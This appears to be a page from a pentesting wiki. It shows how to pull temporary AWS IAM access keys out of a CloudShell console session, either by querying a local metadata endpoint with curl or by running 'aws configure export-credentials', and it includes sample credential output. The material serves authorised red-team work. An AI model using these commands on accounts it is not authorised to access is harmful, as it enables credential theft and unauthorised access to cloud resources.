Generate IAM Access Keys from CloudShell

Using an undocumented endpoint, we can leverage CloudShell from the AWS Console and create AWS Access Keys for the logged on user.

I originally learned of this from Christophe Tafani-Dereeper's blog post

Why Use This?

When performing pentesting or red teaming, we may encounter a user with console access or gain access to an existing console session
By retrieving AWS Access Keys, we can leverage this for further enumeration from our command line and tools

Obtaining AWS Access Keys from CloudShell

CloudShell provides a ready-to-use CLI environment for the logged-on user/role without needing to set up credentials like you would on say your computer
It's able to do this because it's retrieving credentials each time a command is run (see screenshot) from the instance metadata service

Option 1: Querying IMDS Service

Now that we know the endpoint, we can query it ourselves and get the plaintext credentials

# Get the token 
TOKEN=`curl -X PUT "http://localhost:1338/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`

# Retrieve creds 
curl -H "X-aws-ec2-metadata-token: $TOKEN" localhost:1338/latest/meta-data/container/security-credentials
{
        "Type": "",
        "AccessKeyId": "ASIAUU...",
        "SecretAccessKey": "ak24Bx8e...",
        "Token": "IQoJb3Jp...",
        "Expiration": "2024-12-18T18:10:17Z",
        "Code": "Success"

Option 2: Get Existing Credentials

Alternatively, run this command in CloudShell and it exports the current credentials in use (i.e., it doesn't renew creds with a later expiration date like querying the IMDS service will)

aws configure export-credentials
{
  "Version": 1,
  "AccessKeyId": "ASIA[REDACTED]",
  "SecretAccessKey": "3LDU[REDACTED]",
  "SessionToken": "IQoJ[REDACTED]",
  "Expiration": "2024-12-15T01:47:22+00:00"
}

PreviousGenerate AWS Console Session NextPassword Spraying AWS IAM Users

Last updated 24 days ago

Was this helpful?